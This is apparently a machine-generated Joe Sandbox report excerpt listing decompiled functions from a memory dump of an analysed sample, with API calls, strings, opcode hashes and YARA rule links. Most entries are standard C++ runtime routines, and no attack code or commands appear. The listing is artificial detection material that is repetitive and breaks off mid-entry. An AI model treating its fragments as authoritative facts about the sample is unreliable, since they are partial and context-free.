Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: std::_$GetctypeLocinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1612978173-1405518554
Opcode ID: f3309cd69573ee9005b0e7113b5e66912ef7be2866917512603c6b66ffbc6d9e
Instruction ID: a541e743fb51e517bee3727e2be9e509801d02aa338442105857725340b294b7
Opcode Fuzzy Hash: f3309cd69573ee9005b0e7113b5e66912ef7be2866917512603c6b66ffbc6d9e
Instruction Fuzzy Hash: 8A513A32F09B418AEF14DF60E8902EC3365AF44748F084536DB8DE6A96DF3CD5569346

Function 00007FF621890526 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621890647
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189064D

Part of subcall function 00007FF6218C0E88: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,-2723E8D8DEBC5094,00007FF6218CC3D2), ref: 00007FF6218C0ED8
Part of subcall function 00007FF6218C0E88: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,-2723E8D8DEBC5094,00007FF6218CC3D2), ref: 00007FF6218C0F19

Strings

ios_base::badbit set, xrefs: 00007FF621890685, 00007FF6218906BC, 00007FF6218906FA
exists, xrefs: 00007FF621890663

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ExceptionFileHeaderRaise
String ID: exists$ios_base::badbit set
API String ID: 240014264-2074760687
Opcode ID: a4f327a84339e12cc55e92ce62d72d2997565a8db53c75ec50c66e7b8b607d78
Instruction ID: 2590d4dab18d723ea1913ae69cad6ef4d28e4a4d2fa2ff447e2b97e651ec5ca1
Opcode Fuzzy Hash: a4f327a84339e12cc55e92ce62d72d2997565a8db53c75ec50c66e7b8b607d78
Instruction Fuzzy Hash: 0F410C72A1CBC695DF20DB14E8D42EA7361FB85344F804232D68DC3AAADF6CD545CB42

Function 00007FF621890BFF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621890D1F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621890D25

Part of subcall function 00007FF6218C0E88: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,-2723E8D8DEBC5094,00007FF6218CC3D2), ref: 00007FF6218C0ED8
Part of subcall function 00007FF6218C0E88: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,-2723E8D8DEBC5094,00007FF6218CC3D2), ref: 00007FF6218C0F19

Strings

ios_base::badbit set, xrefs: 00007FF621890D5D, 00007FF621890D94, 00007FF621890DD2
exists, xrefs: 00007FF621890D3B

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ExceptionFileHeaderRaise
String ID: exists$ios_base::badbit set
API String ID: 240014264-2074760687
Opcode ID: a5a59e918b60e0c8ffbbc047f386daa408d0b82dfff3e722bcb7dc2d295da79a
Instruction ID: 334a5ffcbe6c71d4b96ee891509fc458f4b4fa283788457af8c8447e49a0bb9d
Opcode Fuzzy Hash: a5a59e918b60e0c8ffbbc047f386daa408d0b82dfff3e722bcb7dc2d295da79a
Instruction Fuzzy Hash: 1A410A72A5DAC691DF20DB14E8D42EE7361FB84384F804232D68DC3AAADF6CD545CB41

Function 00007FF6218CB210 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,00007FF6218CB8FA), ref: 00007FF6218CB226
GetProcAddress.KERNEL32(?,?,?,00007FF6218CB8FA), ref: 00007FF6218CB236

Strings

GetTempPath2W, xrefs: 00007FF6218CB22C
kernel32.dll, xrefs: 00007FF6218CB21F

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetTempPath2W$kernel32.dll
API String ID: 1646373207-1846531799
Opcode ID: 85c4015c5df5ee79752990f65a767554006cfd6127e60443cb10f02faa6b2ab0
Instruction ID: f99cdcfad5080395bc87ea3c808fe4015109b7e913cbfd3eb635edea0f433df4
Opcode Fuzzy Hash: 85c4015c5df5ee79752990f65a767554006cfd6127e60443cb10f02faa6b2ab0
Instruction Fuzzy Hash: 82E01225B0CA0681EF049F11FDC80796361BF48B84B885035E90EC7334DE3CD6598701

Function 00007FF62188D620 Relevance: 6.4, APIs: 4, Instructions: 370COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188DB64
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188DB6A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188DB76
SysFreeString.OLEAUT32 ref: 00007FF62188DB97

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$FreeString
String ID:
API String ID: 1965679434-0
Opcode ID: 2998fa9bb9999d3e82c5491f1b47d91fad8d262029d092912147f37ef93b7446
Instruction ID: 43febaef308a7639af744a878f842ddeca4143050b7b2eadc654582c150b30b3
Opcode Fuzzy Hash: 2998fa9bb9999d3e82c5491f1b47d91fad8d262029d092912147f37ef93b7446
Instruction Fuzzy Hash: 07E19F62F18A859AFF00DBA1D8902AC23B2EB457D8F414635DE1DA7B8ADE3CD5548381

Function 00007FF6218AC578 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6218AC5F7
WriteFile.KERNEL32 ref: 00007FF6218AC8BF
WriteFile.KERNEL32 ref: 00007FF6218AC905
GetLastError.KERNEL32 ref: 00007FF6218AC9BB

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 51ca5d62aa19301a18794717acfbf1a46562df65ce568f5fb7798e040ec77a5b
Instruction ID: 2738c4c4c1889aa8fc7026134a07c2fa7a8d5ca41957136e2aa47a4830543ccd
Opcode Fuzzy Hash: 51ca5d62aa19301a18794717acfbf1a46562df65ce568f5fb7798e040ec77a5b
Instruction Fuzzy Hash: 14D1CF22B1CA458AEB11CF69D8802AC37A5FB54B98B444226DF5DD7BD9DF3CD406C342

Function 00007FF6218ACF38 Relevance: 6.2, APIs: 4, Instructions: 218COMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF6218ACF23), ref: 00007FF6218AD054
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF6218ACF23), ref: 00007FF6218AD0DF

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 3f62383259c36c84ae499e9679ffdb2c1832cde853ef017496f7ee74174e2e70
Instruction ID: 4caf4c04fd2d75a9a18b0bff55fe97c979a1142ba714f3d50e313dc392b17686
Opcode Fuzzy Hash: 3f62383259c36c84ae499e9679ffdb2c1832cde853ef017496f7ee74174e2e70
Instruction Fuzzy Hash: 0E91B162A1CA5286FF509B659CC02BD6BA4BB05B98F544239DE0ED76C5EF3DE442C303

Function 00007FF62185CAD0 Relevance: 6.2, APIs: 4, Instructions: 158COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF62185CC02
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185CC08
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185CC65
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185CCAC

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID:
API String ID: 3936042273-0
Opcode ID: b572f220ee9422ac9f272daffff2a5a9d8f78b76b1d5faece2a0b73a52ccb766
Instruction ID: deb5a8d011c8b9b0b555aaf14767498a1cfcb7919fa5d98647fcebdb2d6fa8fb
Opcode Fuzzy Hash: b572f220ee9422ac9f272daffff2a5a9d8f78b76b1d5faece2a0b73a52ccb766
Instruction Fuzzy Hash: D341F362B0AA8A51FF188B65D88437C6295DF44BF0F554A31CF2EC77C5EF6CA4918302

Function 00007FF62185B3D0 Relevance: 6.1, APIs: 4, Instructions: 147COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185B528
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185B52E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185B534
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185B59C

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: d64cac054dfc49637f45fb3c5c3b1c2b45c7d0e4151578679c24804c2c6c8be1
Instruction ID: 01930bbd4baa3b7ee1130f651cf91b735fcf729c24bdc82fc0559f2c18184358
Opcode Fuzzy Hash: d64cac054dfc49637f45fb3c5c3b1c2b45c7d0e4151578679c24804c2c6c8be1
Instruction Fuzzy Hash: 5F51AFB2719B8191EF18CF24E88427C63A5FB44F94F544635EBAD87A89CF2CD4A0C340

Function 00007FF621852C80 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6218CC5EC: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6218CC609
Part of subcall function 00007FF6218CC5EC: std::locale::_Setgloballocale.LIBCPMT ref: 00007FF6218CC62C

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF621852CC1
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF621852CE6
std::_Facet_Register.LIBCPMT ref: 00007FF621852D92
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF621852DF4

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_RegisterSetgloballocalestd::locale::_
String ID:
API String ID: 3698853521-0
Opcode ID: 6a27f084708a09234de851034fcda8b8cc84ced29d4d67e07d634d37750424d1
Instruction ID: 1ad53d411680fd4847b0398e6e48f31d7aadec3afcd40af411284bf7240ad8a1
Opcode Fuzzy Hash: 6a27f084708a09234de851034fcda8b8cc84ced29d4d67e07d634d37750424d1
Instruction Fuzzy Hash: 6A417122A1CB4691EF54DF15E8802B973A1FB84B94F590631EA9EC37A6DF3DE441C702

Function 00007FF6218A06FC Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A0775
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A07D1
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A080C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A0831

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f1f9df1a05da3301ed415653e8360f7cb12179a044a2575d07df28b1a0800ec9
Instruction ID: c3ef2908b4eb767eea98a579b4fe4a7fc4088fb28d82f3dc146c8c9b3d093792
Opcode Fuzzy Hash: f1f9df1a05da3301ed415653e8360f7cb12179a044a2575d07df28b1a0800ec9
Instruction Fuzzy Hash: E3410C2290DA8586EF529F25CCA027D3BA0EB49F84F498071CA8CC73C6DE3EA455C757

Function 00007FF6218578A0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6218578CB
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6218578F0
std::_Facet_Register.LIBCPMT ref: 00007FF62185799B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6218579E6

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 1168246061-0
Opcode ID: fce11bbf2716b712929d21612f2a8f238f427733906def6abb3c40e1e27c6ea6
Instruction ID: 4a6c3fdde35f411b98392698d8b39a69cc02fa0aaaf9fffb9573cfeb7849e934
Opcode Fuzzy Hash: fce11bbf2716b712929d21612f2a8f238f427733906def6abb3c40e1e27c6ea6
Instruction Fuzzy Hash: 3D416022A1CA4690EF24DF15EC802796770FB84BA4F594631EA9EC77A6DF3CE441C712

Function 00007FF62188AB80 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF62188ABAB
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF62188ABD0
std::_Facet_Register.LIBCPMT ref: 00007FF62188AC7B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF62188ACC6

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 1168246061-0
Opcode ID: 73d040060e39de7473f733929aeeb815445ca65359d0c265211a911782271014
Instruction ID: 77d59f2ab7e645b662e315cbff28527d9d152adb74fa28b47cafb57897927a18
Opcode Fuzzy Hash: 73d040060e39de7473f733929aeeb815445ca65359d0c265211a911782271014
Instruction Fuzzy Hash: E1416F22A1CA4682EF199F15E8802796361FB94BD8F190631EA5DC77E6DF3DE4418702

Function 00007FF621854E10 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF621854E3B
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF621854E60
std::_Facet_Register.LIBCPMT ref: 00007FF621854F0B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF621854F56

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 1168246061-0
Opcode ID: acbc9ea0ed55ab8395d29e3490695ccec0bb7a6dea11a1816461c93234175631
Instruction ID: c3102b6d956bc053433d532910b3f8e033ad5583120c5e0474c3c2bd7b97310d
Opcode Fuzzy Hash: acbc9ea0ed55ab8395d29e3490695ccec0bb7a6dea11a1816461c93234175631
Instruction Fuzzy Hash: A4416062A1CA4691EF14DB15EC802797760FB88BA4F590231EA9EC77A5DF3CE441C702

Function 00007FF6218CB3F4 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF6218CB43D
GetLastError.KERNEL32 ref: 00007FF6218CB44B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00007FF6218550C9), ref: 00007FF6218CB480
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00007FF6218550C9), ref: 00007FF6218CB48E

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: b0c4d9c72fcc6461851340ae7f6c093d4e41e08a8bab11e5154c9cbc0382217d
Instruction ID: 6d9e443d1ab3af4eba02ec40bc8f79cf9da7d1f04980d800fbcb77fc2272676d
Opcode Fuzzy Hash: b0c4d9c72fcc6461851340ae7f6c093d4e41e08a8bab11e5154c9cbc0382217d
Instruction Fuzzy Hash: C0212976A1CB8586EB208F11E88432EB6B4F789B94F140238EB89D7B54DF3CD5018B00

Function 00007FF6218CB8E0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6218CB210: GetModuleHandleW.KERNEL32(?,?,?,00007FF6218CB8FA), ref: 00007FF6218CB226
Part of subcall function 00007FF6218CB210: GetProcAddress.KERNEL32(?,?,?,00007FF6218CB8FA), ref: 00007FF6218CB236

GetLastError.KERNEL32 ref: 00007FF6218CB904

Part of subcall function 00007FF6218A98B4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF62189F8CA,?,?,-2723E8D8DEBC5093,00007FF6218A8156), ref: 00007FF6218A98DA

GetFileAttributesW.KERNEL32 ref: 00007FF6218CB913
__std_fs_open_handle.LIBCPMT ref: 00007FF6218CB93C
CloseHandle.KERNEL32 ref: 00007FF6218CB94E

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Handle$AddressAttributesCloseErrorFeatureFileLastModulePresentProcProcessor__std_fs_open_handle
String ID:
API String ID: 156590933-0
Opcode ID: 6a84e7cc61d3f6faa1a02f0b285c9e89f06a54f244136a8e8d2e5cb925bd3053
